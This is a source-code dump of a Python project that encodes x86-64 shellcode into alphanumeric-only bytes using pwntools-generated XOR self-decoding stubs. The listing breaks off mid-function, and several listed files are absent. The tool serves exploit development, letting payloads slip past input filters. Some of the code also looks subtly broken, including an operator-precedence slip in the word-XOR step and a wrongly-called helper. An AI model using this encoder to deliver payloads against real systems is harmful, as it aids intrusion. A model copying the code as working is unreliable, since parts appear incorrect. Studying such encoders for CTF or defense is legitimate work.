├── .gitignore
├── encoder
    ├── __init__.py
    ├── encoder.py
    ├── shellcode_template.py
    └── util.py
├── main.py
└── readme.md


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Created by .ignore support plugin (hsz.mobi)
  2 | ### JetBrains template
  3 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
  4 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
  5 | 
  6 | # User-specific stuff
  7 | .idea/**/workspace.xml
  8 | .idea/**/tasks.xml
  9 | .idea/**/usage.statistics.xml
 10 | .idea/**/dictionaries
 11 | .idea/**/shelf
 12 | 
 13 | # Generated files
 14 | .idea/**/contentModel.xml
 15 | 
 16 | # Sensitive or high-churn files
 17 | .idea/**/dataSources/
 18 | .idea/**/dataSources.ids
 19 | .idea/**/dataSources.local.xml
 20 | .idea/**/sqlDataSources.xml
 21 | .idea/**/dynamic.xml
 22 | .idea/**/uiDesigner.xml
 23 | .idea/**/dbnavigator.xml
 24 | 
 25 | # Gradle
 26 | .idea/**/gradle.xml
 27 | .idea/**/libraries
 28 | 
 29 | # Gradle and Maven with auto-import
 30 | # When using Gradle or Maven with auto-import, you should exclude module files,
 31 | # since they will be recreated, and may cause churn.  Uncomment if using
 32 | # auto-import.
 33 | # .idea/artifacts
 34 | # .idea/compiler.xml
 35 | # .idea/jarRepositories.xml
 36 | # .idea/modules.xml
 37 | # .idea/*.iml
 38 | # .idea/modules
 39 | # *.iml
 40 | # *.ipr
 41 | 
 42 | # CMake
 43 | cmake-build-*/
 44 | 
 45 | # Mongo Explorer plugin
 46 | .idea/**/mongoSettings.xml
 47 | 
 48 | # File-based project format
 49 | *.iws
 50 | 
 51 | # IntelliJ
 52 | out/
 53 | 
 54 | # mpeltonen/sbt-idea plugin
 55 | .idea_modules/
 56 | 
 57 | # JIRA plugin
 58 | atlassian-ide-plugin.xml
 59 | 
 60 | # Cursive Clojure plugin
 61 | .idea/replstate.xml
 62 | 
 63 | # Crashlytics plugin (for Android Studio and IntelliJ)
 64 | com_crashlytics_export_strings.xml
 65 | crashlytics.properties
 66 | crashlytics-build.properties
 67 | fabric.properties
 68 | 
 69 | # Editor-based Rest Client
 70 | .idea/httpRequests
 71 | 
 72 | # Android studio 3.1+ serialized cache file
 73 | .idea/caches/build_file_checksums.ser
 74 | 
 75 | ### Vim template
 76 | # Swap
 77 | [._]*.s[a-v][a-z]
 78 | !*.svg  # comment out if you don't need vector files
 79 | [._]*.sw[a-p]
 80 | [._]s[a-rt-v][a-z]
 81 | [._]ss[a-gi-z]
 82 | [._]sw[a-p]
 83 | 
 84 | # Session
 85 | Session.vim
 86 | Sessionx.vim
 87 | 
 88 | # Temporary
 89 | .netrwhist
 90 | *~
 91 | # Auto-generated tag files
 92 | tags
 93 | # Persistent undo
 94 | [._]*.un~
 95 | 
 96 | ### Kate template
 97 | # Swap Files #
 98 | .*.kate-swp
 99 | .swp.*
100 | 
101 | ### Example user template template
102 | ### Example user template
103 | 
104 | # IntelliJ project files
105 | .idea
106 | *.iml
107 | out
108 | gen
109 | ### Python template
110 | # Byte-compiled / optimized / DLL files
111 | __pycache__/
112 | *.py[cod]
113 | *$py.class
114 | 
115 | # C extensions
116 | *.so
117 | 
118 | # Distribution / packaging
119 | .Python
120 | build/
121 | develop-eggs/
122 | dist/
123 | downloads/
124 | eggs/
125 | .eggs/
126 | lib/
127 | lib64/
128 | parts/
129 | sdist/
130 | var/
131 | wheels/
132 | share/python-wheels/
133 | *.egg-info/
134 | .installed.cfg
135 | *.egg
136 | MANIFEST
137 | 
138 | # PyInstaller
139 | #  Usually these files are written by a python script from a template
140 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
141 | *.manifest
142 | *.spec
143 | 
144 | # Installer logs
145 | pip-log.txt
146 | pip-delete-this-directory.txt
147 | 
148 | # Unit test / coverage reports
149 | htmlcov/
150 | .tox/
151 | .nox/
152 | .coverage
153 | .coverage.*
154 | .cache
155 | nosetests.xml
156 | coverage.xml
157 | *.cover
158 | *.py,cover
159 | .hypothesis/
160 | .pytest_cache/
161 | cover/
162 | 
163 | # Translations
164 | *.mo
165 | *.pot
166 | 
167 | # Django stuff:
168 | *.log
169 | local_settings.py
170 | db.sqlite3
171 | db.sqlite3-journal
172 | 
173 | # Flask stuff:
174 | instance/
175 | .webassets-cache
176 | 
177 | # Scrapy stuff:
178 | .scrapy
179 | 
180 | # Sphinx documentation
181 | docs/_build/
182 | 
183 | # PyBuilder
184 | .pybuilder/
185 | target/
186 | 
187 | # Jupyter Notebook
188 | .ipynb_checkpoints
189 | 
190 | # IPython
191 | profile_default/
192 | ipython_config.py
193 | 
194 | # pyenv
195 | #   For a library or package, you might want to ignore these files since the code is
196 | #   intended to run in multiple environments; otherwise, check them in:
197 | # .python-version
198 | 
199 | # pipenv
200 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
201 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
202 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
203 | #   install all needed dependencies.
204 | #Pipfile.lock
205 | 
206 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
207 | __pypackages__/
208 | 
209 | # Celery stuff
210 | celerybeat-schedule
211 | celerybeat.pid
212 | 
213 | # SageMath parsed files
214 | *.sage.py
215 | 
216 | # Environments
217 | .env
218 | .venv
219 | env/
220 | venv/
221 | ENV/
222 | env.bak/
223 | venv.bak/
224 | 
225 | # Spyder project settings
226 | .spyderproject
227 | .spyproject
228 | 
229 | # Rope project settings
230 | .ropeproject
231 | 
232 | # mkdocs documentation
233 | /site
234 | 
235 | # mypy
236 | .mypy_cache/
237 | .dmypy.json
238 | dmypy.json
239 | 
240 | # Pyre type checker
241 | .pyre/
242 | 
243 | # pytype static type analyzer
244 | .pytype/
245 | 
246 | # Cython debug symbols
247 | cython_debug/
248 | 
249 | ### Linux template
250 | *~
251 | 
252 | # temporary files which can be created if a process still has a handle open of a deleted file
253 | .fuse_hidden*
254 | 
255 | # KDE directory preferences
256 | .directory
257 | 
258 | # Linux trash folder which might appear on any partition or disk
259 | .Trash-*
260 | 
261 | # .nfs files are created when an open file is removed but is still being accessed
262 | .nfs*
263 | 
264 | ### Windows template
265 | # Windows thumbnail cache files
266 | Thumbs.db
267 | Thumbs.db:encryptable
268 | ehthumbs.db
269 | ehthumbs_vista.db
270 | 
271 | # Dump file
272 | *.stackdump
273 | 
274 | # Folder config file
275 | [Dd]esktop.ini
276 | 
277 | # Recycle Bin used on file shares
278 | $RECYCLE.BIN/
279 | 
280 | # Windows Installer files
281 | *.cab
282 | *.msi
283 | *.msix
284 | *.msm
285 | *.msp
286 | 
287 | # Windows shortcuts
288 | *.lnk
289 | 
290 | 


--------------------------------------------------------------------------------
/encoder/__init__.py:
--------------------------------------------------------------------------------
1 | from .encoder import Encoder, encode
2 | 


--------------------------------------------------------------------------------
/encoder/encoder.py:
--------------------------------------------------------------------------------
  1 | from encoder import util
  2 | from .shellcode_template import CodeInit, AutoNumGen, Mov, MulReg, Padding, ShellCodeXor
  3 | import typing
  4 | 
  5 | import pwn
  6 | 
  7 | IdxList = typing.List[int]
  8 | EncBlock = typing.Tuple[int, IdxList]
  9 | log_process = None
 10 | 
 11 | 
 12 | class Encoder(object):
 13 |     def __init__(self, shellcode, base_reg: str, offset: int = 0):
 14 |         self.base_reg = base_reg
 15 |         self.offset = offset
 16 |         self.shellcode = shellcode
 17 |         self.origin_shellcode = shellcode
 18 | 
 19 |     def encode(self):
 20 |         shift_offset = 0
 21 |         shellcode_list = self.block_encode_gen()
 22 |         while True:
 23 |             all_shellcode = ''
 24 |             all_shellcode += Mov(self.base_reg, "rbx")
 25 |             all_shellcode += CodeInit()
 26 |             for idx, shellcode in shellcode_list:
 27 |                 enc_offset = idx + self.offset + shift_offset
 28 |                 re = None
 29 |                 if enc_offset > 0 and util.num_size(enc_offset) <= 2:
 30 |                     re = MulReg.find_mul(enc_offset)
 31 |                 if re is None:
 32 |                     all_shellcode += AutoNumGen(enc_offset)
 33 |                     all_shellcode += Mov(src="rax", dst="rsi")
 34 |                     all_shellcode += shellcode
 35 |                 else:
 36 |                     mul1, mul2 = re
 37 |                     all_shellcode += MulReg(mul1=mul1, mul2=mul2, dst="si")
 38 |                     all_shellcode += shellcode
 39 |             asm_code = util.asm(all_shellcode)
 40 |             # print(f"we try offset: {shift_offset}")
 41 |             # print(f"the shellcode length: {len(asm_code)}")
 42 |             if len(asm_code) < shift_offset:
 43 |                 break
 44 | 
 45 |             global log_process
 46 |             if log_process is not None:
 47 |                 process_num = round((shift_offset / len(asm_code)) * 100)
 48 |                 log_process.status(f" ({process_num}%)")
 49 | 
 50 |             inc_count = (len(asm_code) - shift_offset) // 5
 51 |             if inc_count == 0:
 52 |                 inc_count = 1
 53 |             shift_offset += inc_count
 54 |         padding_size = shift_offset - len(asm_code)
 55 |         asm_code += util.asm(str(Padding(padding_size)))
 56 |         return asm_code + self.shellcode
 57 | 
 58 |     def block_encode_gen(self):
 59 |         enc_blocks = self.split_enc_idx()
 60 |         shellcode_list = []
 61 |         for enc_block in enc_blocks:
 62 |             shellcode = ''
 63 |             while len(enc_block[1]) != 0:
 64 |                 enc_shellcode, re_enc_block, part_shellcode, score = self.byte_xor_strategy(enc_block)
 65 |                 re = self.word_xor_strategy(enc_block)
 66 |                 if re is not None and re[3] < score:
 67 |                     self.shellcode = re[0]
 68 |                     enc_block = re[1]
 69 |                     shellcode += re[2]
 70 |                 else:
 71 |                     self.shellcode = enc_shellcode
 72 |                     enc_block = re_enc_block
 73 |                     shellcode += part_shellcode
 74 |             shellcode_list.append((enc_block[0], shellcode))
 75 |         return shellcode_list
 76 | 
 77 |     # def dword_xor_strategy(self, enc_block: EncBlock) -> typing.Tuple[bytes, EncBlock, str, float]:
 78 |     #     enc_shellcode = bytearray(self.shellcode)
 79 |     #     off = enc_block[0]
 80 |     #     idx_list = enc_block[1]
 81 |     #     xor_map = {}
 82 |     #     for idx in idx_list:
 83 |     #         xor_data = 0
 84 |     #         for i in range(4):
 85 |     #             self.shellcode
 86 | 
 87 |     def word_xor_strategy(self, enc_block: EncBlock) -> typing.Tuple[bytes, EncBlock, str, float]:
 88 |         enc_shellcode = bytearray(self.shellcode)
 89 |         off = enc_block[0]
 90 |         idx_list = enc_block[1]
 91 |         enc_bytes = [self.shellcode[off + i] for i in idx_list]
 92 |         xor_map = self.find_max_match(enc_bytes)
 93 | 
 94 |         # data_list = [(idx, xor_map[self.shellcode[off + idx]]) for idx in idx_list]
 95 |         i = 0
 96 |         word_data_list: typing.List[typing.Tuple[int, int]] = []
 97 |         idx_length = len(idx_list)
 98 |         while i < idx_length - 1:
 99 |             if idx_list[i + 1] - idx_list[i] == 1:
100 |                 idx = idx_list[i]
101 |                 word_data_list.append((idx, (xor_map[self.shellcode[off + idx]]) + xor_map[
102 |                     self.shellcode[off + idx + 1]] << 8))
103 |             i += 1
104 | 
105 |         if len(word_data_list) == 0:
106 |             return None
107 | 
108 |         idx_map = {}
109 |         for i in word_data_list:
110 |             if i[1] in idx_map:
111 |                 idx_map[i[1]].append(i[0])
112 |             else:
113 |                 idx_map[i[1]] = [i[0]]
114 | 
115 |         xor_list = [(key, value) for key, value in idx_map.items()]
116 |         xor_list.sort(key=lambda x: len(x[1]), reverse=True)
117 |         xor_data = xor_list[0][0]
118 |         xor_idx = xor_list[0][1]
119 | 
120 |         i = 0
121 |         while i < len(xor_idx) - 1:  # avoid some case like "\x00\x00\x00\x00"
122 |             if xor_idx[i + 1] - xor_idx[i] == 1:
123 |                 xor_idx.pop(i + 1)
124 |             i += 1
125 | 
126 |         encode_byte_count = 0
127 | 
128 |         shellcode = ''
129 |         shellcode += AutoNumGen(xor_data)
130 |         for idx in xor_idx:
131 |             shellcode += "xor [rbx+rsi+{idx:#x}], ax\n".format(idx=idx)
132 |             idx_list.remove(idx)
133 |             idx_list.remove(idx + 1)
134 |             enc_shellcode[off + idx] ^= xor_data & 0xff
135 |             enc_shellcode[off + idx + 1] ^= xor_data >> 8
136 |             encode_byte_count += 2
137 | 
138 |         i = 0
139 |         while i < len(idx_list):
140 |             idx = idx_list[i]
141 |             enc_data = xor_map[self.shellcode[off + idx]]
142 |             if enc_data == xor_data & 0xff:
143 |                 shellcode += "xor [rbx+rsi+{idx:#x}], al\n".format(idx=idx)
144 |                 idx_list.pop(i)
145 |                 enc_shellcode[off + idx] ^= xor_data & 0xff
146 |                 encode_byte_count += 1
147 |             elif enc_data == xor_data >> 8:
148 |                 shellcode += "xor [rbx+rsi+{idx:#x}], ah\n".format(idx=idx)
149 |                 idx_list.pop(i)
150 |                 enc_shellcode[off + idx] ^= xor_data >> 8
151 |                 encode_byte_count += 1
152 |             else:
153 |                 i += 1
154 | 
155 |         shellcode_length = len(util.asm(shellcode))
156 | 
157 |         return bytes(enc_shellcode), (off, idx_list), shellcode, shellcode_length / encode_byte_count
158 | 
159 |     def byte_xor_strategy(self, enc_block: EncBlock) -> typing.Tuple[bytes, EncBlock, str, float]:
160 |         enc_shellcode = bytearray(self.shellcode)
161 |         off = enc_block[0]
162 |         idx_list = enc_block[1]
163 |         enc_bytes = [self.shellcode[off + i] for i in idx_list]
164 |         xor_map = self.find_max_match(enc_bytes)
165 | 
166 |         idx_map: typing.Dict[int, typing.List[int]] = {}
167 | 
168 |         for i in idx_list:
169 |             xor_data = xor_map[self.shellcode[off + i]]
170 |             if xor_data in idx_map:
171 |                 idx_map[xor_data].append(i)
172 |             else:
173 |                 idx_map[xor_data] = [i]
174 | 
175 |         xor_list = [(key, value) for key, value in idx_map.items()]
176 |         xor_list.sort(key=lambda x: len(x[1]), reverse=True)
177 | 
178 |         # select the max two
179 |         low_data = xor_list[0][0]
180 |         low_enc_idx = xor_list[0][1]
181 |         if len(xor_list) > 1:
182 |             high_data = xor_list[1][0]
183 |             high_enc_idx = xor_list[1][1]
184 |         else:
185 |             high_data = 0
186 |             high_enc_idx = []
187 | 
188 |         enc_bytes_count = len(low_enc_idx) + len(high_enc_idx)
189 | 
190 |         # first gen data
191 |         data = low_data + (high_data << 8)
192 |         shellcode = ''
193 |         shellcode += AutoNumGen(data=data)
194 |         for idx in low_enc_idx:
195 |             shellcode += "xor [rbx+rsi+{idx:#x}], al\n".format(idx=idx)
196 |             idx_list.remove(idx)
197 |             enc_shellcode[off + idx] ^= low_data
198 |         for idx in high_enc_idx:
199 |             shellcode += "xor [rbx+rsi+{idx:#x}], ah\n".format(idx=idx)
200 |             idx_list.remove(idx)
201 |             enc_shellcode[off + idx] ^= high_data
202 | 
203 |         shellcode_length = len(util.asm(shellcode))
204 |         score = shellcode_length / enc_bytes_count
205 |         return bytes(enc_shellcode), (off, idx_list), shellcode, score
206 | 
207 |     def data_scan(self):
208 |         need_enc = []
209 |         shellcode = bytearray(self.shellcode)
210 |         i = 0
211 |         shellcode_length = len(shellcode)
212 |         while i < shellcode_length:
213 |             if shellcode[i] not in util.alphanum_pool:
214 |                 need_enc.append(i)
215 |             i += 1
216 |         return need_enc
217 | 
218 |     def split_enc_idx(self) -> typing.List[typing.Tuple[int, IdxList]]:
219 |         need_enc = self.data_scan()
220 |         enc_blocks = []
221 | 
222 |         while len(need_enc) != 0:
223 |             max_size = 0
224 |             max_offset = 0
225 |             first_idx = need_enc[0]
226 |             base_offset = first_idx - 0x7a
227 |             while base_offset <= first_idx - 0x30:
228 |                 point = 0
229 |                 for idx in need_enc:
230 |                     off = idx - base_offset
231 |                     if 0x30 <= off <= 0x39 or 0x41 <= off <= 0x5a or 0x61 <= off <= 0x7a:
232 |                         point += 1
233 | 
234 |                 if point > max_size:
235 |                     max_size = point
236 |                     max_offset = base_offset
237 |                 base_offset += 1
238 | 
239 |             i = 0
240 |             enc_block = []
241 |             while i < len(need_enc):
242 |                 off = need_enc[i] - max_offset
243 |                 if 0x30 <= off <= 0x39 or 0x41 <= off <= 0x5a or 0x61 <= off <= 0xff:
244 |                     enc_block.append(off)
245 |                     need_enc.pop(i)
246 |                 else:
247 |                     i += 1
248 | 
249 |             enc_blocks.append((max_offset, enc_block))
250 |         return enc_blocks
251 | 
252 |     @staticmethod
253 |     def find_max_match(data: typing.List[int]) -> dict:
254 |         xor_data_map = {}
255 | 
256 |         while len(data) != 0:
257 |             max_point = 0
258 |             max_data = 0
259 | 
260 |             # we prefer alphanum
261 |             l = [i for i in range(0x100)]
262 |             l.sort(key=lambda x: x in util.alphanum_pool, reverse=True)
263 |             for i in l:
264 |                 point = 0
265 |                 for d in data:
266 |                     if d ^ i in util.alphanum_pool:
267 |                         point += 1
268 | 
269 |                 if point > max_point:
270 |                     max_point = point
271 |                     max_data = i
272 | 
273 |             i = 0
274 |             while i < len(data):
275 |                 if data[i] ^ max_data in util.alphanum_pool:
276 |                     xor_data_map[data[i]] = max_data
277 |                     data.pop(i)
278 |                 else:
279 |                     i += 1
280 |         return xor_data_map
281 | 
282 | 
283 | def encoder_with_xor_compress(shellcode: bytes, base_reg, offset=0):
284 |     shellcode_xor = ShellCodeXor((len(shellcode) // 8) + 1)
285 |     e = Encoder(shellcode=util.asm(str(shellcode_xor)), base_reg=base_reg, offset=offset)
286 |     enc_shellcode = e.encode()
287 |     enc_shellcode += ShellCodeXor.shellcode_xor(shellcode)
288 |     return enc_shellcode
289 | 
290 | 
291 | def encoder_direct(shellcode: bytes, base_reg, offset=0):
292 |     e = Encoder(shellcode=shellcode, base_reg=base_reg, offset=offset)
293 |     enc_shellcode = e.encode()
294 |     return enc_shellcode
295 | 
296 | 
297 | def encode(shellcode: bytes, base_reg, offset=0):
298 |     global log_process
299 |     log_process = pwn.log.progress("shellcode is generating step(1/2), plz wait")
300 |     shellcode1 = encoder_direct(shellcode, base_reg, offset)
301 |     log_process.success()
302 |     log_process = pwn.log.progress("shellcode is generating step(2/2), plz wait")
303 |     shellcode2 = encoder_with_xor_compress(shellcode, base_reg, offset)
304 |     log_process.success()
305 |     return shellcode1 if len(shellcode1) < len(shellcode2) else shellcode2
306 | 


--------------------------------------------------------------------------------
/encoder/shellcode_template.py:
--------------------------------------------------------------------------------
  1 | from encoder import util
  2 | from functools import cached_property
  3 | 
  4 | 
  5 | class Shellcode(object):
  6 | 
  7 |     @cached_property
  8 |     def asm(self):
  9 |         return util.asm(str(self))
 10 | 
 11 |     def __len__(self):
 12 |         return len(self.asm)
 13 | 
 14 |     def code(self):
 15 |         raise Exception("do not call virtual class")
 16 | 
 17 |     def __str__(self):
 18 |         return self.code
 19 | 
 20 |     def __add__(self, other):
 21 |         return str(self) + str(other)
 22 | 
 23 |     def __radd__(self, other):
 24 |         return str(other) + str(self)
 25 | 
 26 | 
 27 | class Mov(Shellcode):
 28 |     stack_mov = """
 29 | push {src}
 30 | pop {dst}
 31 | """
 32 | 
 33 |     stack_mov2 = """
 34 | push {src}
 35 | push rsp
 36 | pop rcx
 37 | xor [rcx], {dst}
 38 | xor {dst}, [rcx] 
 39 | """
 40 |     stack_mov3 = """ 
 41 | push {src}
 42 | push rsp
 43 | pop {tmp}
 44 | xor {src}, [{tmp}+0x30]
 45 | xor [{tmp}+0x30], {src}
 46 | xor [{tmp}+0x30], {dst}
 47 | xor {dst}, [{tmp}+0x30]
 48 | """
 49 | 
 50 |     def __init__(self, src, dst):
 51 |         self.src = src
 52 |         self.dst = dst
 53 | 
 54 |     @cached_property
 55 |     def code(self):
 56 |         if self.dst in ("rax", "rcx", "rdx", "r8", "r9", "r10"):
 57 |             return self.stack_mov.format(src=self.src, dst=self.dst)
 58 |         elif self.dst in ("rdi", "rsi"):
 59 |             return self.stack_mov2.format(src=self.src, dst=self.dst)
 60 |         elif self.dst in ("rbx", "r11", "r12", "r13", "r14", "r15", "rsp", "rbp"):
 61 |             if self.src == "rcx":
 62 |                 tmp = "rdx"
 63 |             else:
 64 |                 tmp = "rcx"
 65 |             return self.stack_mov3.format(src=self.src, dst=self.dst, tmp=tmp)
 66 |         else:
 67 |             raise Exception(f"can't mov to reg {self.dst}")
 68 | 
 69 | 
 70 | class Zero(Shellcode):
 71 |     clean_rax = """
 72 | push 0x30
 73 | pop rax
 74 | xor al, 0x30
 75 | """
 76 |     clean2 = """
 77 | push {reg}
 78 | push rsp
 79 | pop rcx
 80 | xor {reg}, [rcx]
 81 | """
 82 | 
 83 |     def __init__(self, reg):
 84 |         self.clean_reg = reg
 85 | 
 86 |     @cached_property
 87 |     def code(self):
 88 |         if self.clean_reg == "rax":
 89 |             return self.clean_rax
 90 |         elif self.clean_reg in (
 91 |                 "rcx", "rdx", "r8", "r9", "r10", "rbx", "r11", "r12", "r13", "r14", "r15", "rsp", "rbp"):
 92 |             return self.clean_rax + Mov(src="rax", dst=self.clean_reg)
 93 |         elif self.clean_reg in ("rdi", "rsi"):
 94 |             return self.clean2.format(reg=self.clean_reg)
 95 |         else:
 96 |             raise Exception(f"can't clean reg {self.clean_reg}")
 97 | 
 98 | 
 99 | class MulReg(Shellcode):
100 |     mul_reg = '''
101 | push {mul1:#x}
102 | push rsp
103 | pop {tmp}
104 | imul {dst}, WORD PTR [{tmp}], {mul2:#x}
105 | '''
106 | 
107 |     # imul will modify rdi/rsi, this not easy to set
108 |     # so ask to select one
109 |     def __init__(self, mul1: int, mul2: int, dst: str = "di", modify_reg: str = "rax"):
110 |         # keep mul1 the small one
111 |         assert dst in ("di", "si")
112 |         if modify_reg not in ("rcx", "rax", "r8", "r9"):
113 |             raise Exception("the src reg must in rcx, rax, r8, r9")
114 |         self.dst = dst
115 |         self.modify_reg = modify_reg
116 |         self.mul1, self.mul2 = (mul1, mul2) if mul1 < mul2 else (mul2, mul1)
117 | 
118 |         mul2_size = util.num_size(self.mul2)
119 |         mul1_size = util.num_size(self.mul1)
120 |         assert mul1_size <= 2
121 |         assert mul2_size <= 2
122 |         assert util.is_alphanumeric(self.mul1, mul1_size)
123 |         assert util.is_alphanumeric(self.mul2, mul2_size)
124 | 
125 |         self.mul1 = self.mul1 if mul1_size == 1 else self.mul1 | 0x30300000
126 | 
127 |     @cached_property
128 |     def code(self):
129 |         return self.mul_reg.format(mul1=self.mul1, mul2=self.mul2, dst=self.dst, tmp=self.modify_reg)
130 | 
131 |     @staticmethod
132 |     def find_mul(data: int):
133 |         assert util.num_size(data) <= 2
134 |         for i in util.mul_iter():
135 |             if i[0] * i[1] & 0xffff == data:
136 |                 return i
137 |         return None
138 | 
139 | 
140 | class XorReg(Shellcode):
141 |     xor_reg = '''
142 | push {xor1:#x}
143 | pop rax
144 | xor {reg}, {xor2:#x}
145 | '''
146 |     reg_map = {1: "al", 2: "ax", 4: "eax"}
147 | 
148 |     def __init__(self, xor1: int, xor2: int):
149 |         xor1_size = util.num_size(xor1)
150 |         xor2_size = util.num_size(xor2)
151 |         assert xor1_size <= 4
152 |         assert xor2_size <= 4
153 |         assert util.is_alphanumeric(xor1, xor1_size)
154 |         assert util.is_alphanumeric(xor2, xor2_size)
155 |         if xor1_size == xor2_size == 2:
156 |             xor1 = xor1 | 0x30300000
157 |             xor2 = xor2 | 0x30300000
158 |         elif xor1_size == 2:
159 |             xor1, xor2 = xor2, xor1
160 | 
161 |         self.xor1 = xor1
162 |         self.xor2 = xor2
163 | 
164 |     @cached_property
165 |     def code(self):
166 |         return self.xor_reg.format(xor1=self.xor1, xor2=self.xor2, reg=self.reg_map[util.num_size(self.xor2)])
167 | 
168 |     @staticmethod
169 |     def find_xor(data: int):
170 |         data_size = util.num_size(data)
171 |         assert data_size <= 4
172 | 
173 |         if data_size == 1:
174 |             return util.xor_table[data]
175 | 
176 |         if data_size == 2:
177 |             data_array = util.p16(data)
178 |             if data_array[1] in util.alphanum_pool:
179 |                 _, n = util.xor_table[data_array[0]]
180 |                 return data ^ n, n
181 |             else:
182 |                 n = util.u16(bytes([util.xor_table[i][0] for i in data_array]))
183 |                 return n, n ^ data
184 | 
185 |         if data_size == 4:
186 |             data_array = util.p32(data)
187 |             if data_array[2] in util.alphanum_pool and data_array[3] in util.alphanum_pool:
188 |                 if data_array[1] in util.alphanum_pool:
189 |                     _, n = util.xor_table[data_array[0]]
190 |                     return data ^ n, n
191 |                 else:
192 |                     n = util.u16(bytes([util.xor_table[i][0] for i in data_array[:2]]))
193 |                     return data ^ n, n
194 |             else:
195 |                 n = util.u32(bytes([util.xor_table[i][0] for i in data_array]))
196 |                 return n, n ^ data
197 | 
198 | 
199 | class MulXorReg(Shellcode):
200 |     mul_xor_reg = '''
201 | xor {reg}, {xor:#x}
202 | '''
203 |     reg_map = {1: "al", 2: "ax"}
204 | 
205 |     def __init__(self, mul1: int, mul2: int, xor: int, modify_reg="di"):
206 |         assert modify_reg in ("di", "si")
207 |         self.mul1 = mul1
208 |         self.mul2 = mul2
209 | 
210 |         xor_size = util.num_size(xor)
211 |         assert xor_size <= 2
212 |         assert util.is_alphanumeric(xor_size)
213 | 
214 |         self.xor = xor
215 |         self.modify_reg = modify_reg
216 | 
217 |     @cached_property
218 |     def code(self):
219 |         code = ''
220 |         code += MulReg(self.mul1, self.mul2, dst=self.modify_reg)
221 |         code += Mov("r" + self.modify_reg, "rax")
222 |         code += self.mul_xor_reg.format(reg=self.reg_map[util.num_size(self.xor)], xor=self.xor)
223 |         return code
224 | 
225 |     @staticmethod
226 |     def find_mul_xor(data: int):
227 |         assert util.num_size(data) <= 2
228 |         for i in util.mul_iter():
229 |             if util.is_alphanumeric((i[0] * i[1] & 0xffff) ^ data, 2):
230 |                 return i[0], i[1], (i[0] * i[1] & 0xffff) ^ data
231 |         return None
232 | 
233 | 
234 | class CodeInit(Shellcode):
235 |     @cached_property
236 |     def code(self):
237 |         code = ''
238 | 
239 |         code += Zero("rdi")
240 |         code += Zero("rsi")
241 | 
242 |         mul1, mul2 = MulReg.find_mul(0x8080)
243 |         code += MulReg(mul1=mul1, mul2=mul2)
244 |         code += Mov(src="rdi", dst="r8")
245 | 
246 |         mul1, mul2 = MulReg.find_mul(0x8010)
247 |         code += MulReg(mul1=mul1, mul2=mul2)
248 |         code += Mov(src="rdi", dst="r9")
249 | 
250 |         mul1, mul2 = MulReg.find_mul(0x0080)
251 |         code += MulReg(mul1=mul1, mul2=mul2)
252 |         code += Mov(src="rdi", dst="r10")
253 |         return code
254 | 
255 | 
256 | class FastNumGen(Shellcode):
257 |     reg_map = {1: "al", 2: "ax"}
258 | 
259 |     def __init__(self, data: int):
260 |         assert util.num_size(data) <= 2
261 |         self.data = data
262 | 
263 |     @cached_property
264 |     def code(self):
265 |         if self.data & 0x8080 == 0x8080:
266 |             src_reg = "r8"
267 |             src_num = 0x8080
268 |         elif self.data & 0x8000 == 0x8000:
269 |             src_reg = "r9"
270 |             src_num = 0x8010
271 |         elif self.data & 0x0080 == 0x0080:
272 |             src_reg = "r10"
273 |             src_num = 0x0080
274 |         else:
275 |             xor1, xor2 = XorReg.find_xor(self.data)
276 |             return str(XorReg(xor1=xor1, xor2=xor2))
277 | 
278 |         code = ''
279 |         code += Mov(src=src_reg, dst="rax")
280 | 
281 |         xor_num = self.data ^ src_num
282 |         if xor_num == 0:
283 |             pass
284 |         elif xor_num < 0x80 and util.is_alphanumeric(xor_num, 1):
285 |             code += f"xor al, {xor_num}\n"
286 |         elif util.is_alphanumeric(xor_num, 2):
287 |             code += f"xor ax, {xor_num}\n"
288 |         else:
289 |             xor1, xor2 = XorReg.find_xor(xor_num)
290 |             code += f"xor {self.reg_map[util.num_size(xor1)]}, {xor1}\n"
291 |             code += f"xor {self.reg_map[util.num_size(xor2)]}, {xor2}\n"
292 |         return code
293 | 
294 | 
295 | class NumGen(Shellcode):
296 |     def __init__(self, data: int):
297 |         self.data = data
298 | 
299 |     @cached_property
300 |     def code(self):
301 |         data_words = []
302 |         data = self.data
303 |         for i in range(4):
304 |             data_words.append((data & 0xffff, i))
305 |             data = data >> 16
306 |         data_words.sort()
307 |         shellcode = ''
308 |         # set rcx == rsp
309 |         shellcode += '''
310 | push rsp
311 | pop rcx
312 | '''
313 |         shellcode += Zero("rax")
314 | 
315 |         shellcode += '''    
316 | xor rax, [rcx+0x30]
317 | xor [rcx+0x30], rax
318 | '''
319 | 
320 |         # TODO: this can be optimize
321 |         prev_number = None
322 |         for i in data_words:
323 |             if i[0] != 0:
324 |                 if prev_number != i[0]:
325 |                     shellcode += AutoNumGen(data=i[0])
326 |                 prev_number = i[0]
327 |                 shellcode += 'xor [rcx+0x%x], ax\n' % (i[1] * 2 + 0x30)
328 | 
329 |         shellcode += "xor [rcx+0x30], rax\n"
330 |         shellcode += "xor rax, [rcx+0x30]\n"
331 | 
332 |         return shellcode
333 | 
334 | 
335 | # set 64bit data to rax with shortest length
336 | class AutoNumGen(Shellcode):
337 |     neg_init = False
338 | 
339 |     def __init__(self, data: int):
340 |         assert -0x7fffffffffffffff <= data < 0x10000000000000000
341 |         self.number = data
342 | 
343 |     @cached_property
344 |     def code(self):
345 |         shellcode = ''
346 |         if self.number == 0:
347 |             shellcode += Zero("rax")
348 |         elif 0 < self.number < 0x80:
349 |             if self.number in util.alphanum_pool:
350 |                 shellcode += """
351 | push {num:#x}
352 | pop rax
353 | """.format(num=self.number)
354 |             else:
355 |                 xor1, xor2 = XorReg.find_xor(self.number)
356 |                 shellcode += XorReg(xor1=xor1, xor2=xor2)
357 |         elif 0x80 <= self.number <= 0xffff:
358 |             shellcode += FastNumGen(self.number)
359 |         elif self.number >= 0x10000:
360 |             shellcode += NumGen(self.number)
361 |         elif self.number < 0:
362 |             if not AutoNumGen.neg_init:
363 |                 shellcode += NumGen(0xffffffffffffffff)
364 |                 shellcode += Mov(src="rax", dst="r15")
365 |                 AutoNumGen.neg_init = True
